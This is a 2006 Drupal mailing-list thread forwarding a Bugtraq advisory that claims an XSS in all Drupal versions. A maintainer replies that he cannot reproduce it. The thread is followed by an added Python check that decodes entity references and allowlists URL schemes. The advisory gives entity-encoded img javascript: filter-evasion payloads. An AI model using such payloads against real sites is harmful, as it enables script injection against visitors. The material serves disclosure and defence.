[development] [liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

Darrel O'Pry dopry at thing.net
Wed Jan 4 18:37:24 UTC 2006


I tried to reproduce this, but was unable to... anyone else have any
luck?

On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:
> This is from bugtraq...
> 
> email message attachment
> > -------- Forwarded Message --------
> > From: liz0 at bsdmail.com
> > To: bugtraq at securityfocus.com
> > Subject: Drupal all versiyon xss cehennem.org
> > Date: 2 Jan 2006 10:45:25 -0000
> > 
> > Drupal all versiyon xss 
> > ----------------------------------------------------
> > site:http://www.drupal.org
> > 
> > Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
> > --------------------------------------------------
> > 
> > img tag : on
> > 
> > ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
> > 
> > Decimal Value: HTML (without semicolons) 
> > 
> > <img src=javascript:alert('XSS')>  = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
> > ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> > Decimal Value: HTML (with semicolons)
> > 
> > <img src=javascript:alert('XSS')>  = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
> > 
> > 
> > ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> > example:
> > post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable 
> > 
> > post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable
> > 
> >   
> > ---------------------------------------------------------
> > 
> > Credit:Liz0ziM
> > mail:liz0 at bsdmail.com
> > www.biyo.tk , www.cehennem.org
> > 
> > Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
> > 
> > -----------------------------------------------------------
> > Source:
> > 
> > http://liz0zim.no-ip.org/drupal.txt
> > 
> > ------------------------------------------------------------
> > 
> > 
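
Added example, not part of the original thread and not Drupal's code: the advisory quoted above reports that the `javascript:` scheme in an `img` `src` is caught in literal form but not when written as numeric character references. The check below decodes references first (with or without semicolons, as a browser does) and then allowlists the URL scheme, so both forms are treated alike. `ALLOWED_SCHEMES`, the function names and the constructed sample strings are assumptions made for this example.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}  # assumption: schemes a site permits in img src

# src attribute of an <img> tag: double-quoted, single-quoted or unquoted value
IMG_SRC = re.compile(r"""<img\b[^>]*?\bsrc\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)
SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)


def src_scheme(raw):
    """Return the URL scheme a browser would see, or None for a relative URL."""
    value = raw
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        value = value[1:-1]
    # html.unescape decodes decimal and hex references, with or without ';'
    value = html.unescape(value)
    # browsers ignore ASCII whitespace and control characters around a URL scheme
    value = re.sub(r"[\x00-\x20]", "", value)
    match = SCHEME.match(value)
    return match.group(1).lower() if match else None


def unsafe_img_sources(markup):
    """List (raw src value, decoded scheme) for every img whose scheme is not allowed."""
    findings = []
    for match in IMG_SRC.finditer(markup):
        scheme = src_scheme(match.group(1))
        if scheme is not None and scheme not in ALLOWED_SCHEMES:
            findings.append((match.group(1), scheme))
    return findings


def literal_match(markup):
    """Contrast case (hypothetical, not Drupal's filter): literal text search only."""
    return "javascript:" in markup.lower()


# Constructed samples reproducing the two encodings quoted in the advisory
PLAIN = "<img src=javascript:alert('XSS')>"
DECIMAL = "<img src=" + "".join(f"&#{ord(c)}" for c in PLAIN[9:-1]) + ">"
HEX = "<img src=" + "".join(f"&#x{ord(c):X}" for c in PLAIN[9:-1]) + ">"

if __name__ == "__main__":
    for sample in (PLAIN, DECIMAL, HEX, '<img src="/files/logo.png">'):
        print(literal_match(sample), unsafe_img_sources(sample))
```

A production filter would parse the markup with an HTML parser and apply the same decode-then-allowlist step to every URL-bearing attribute, not only `img src`.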


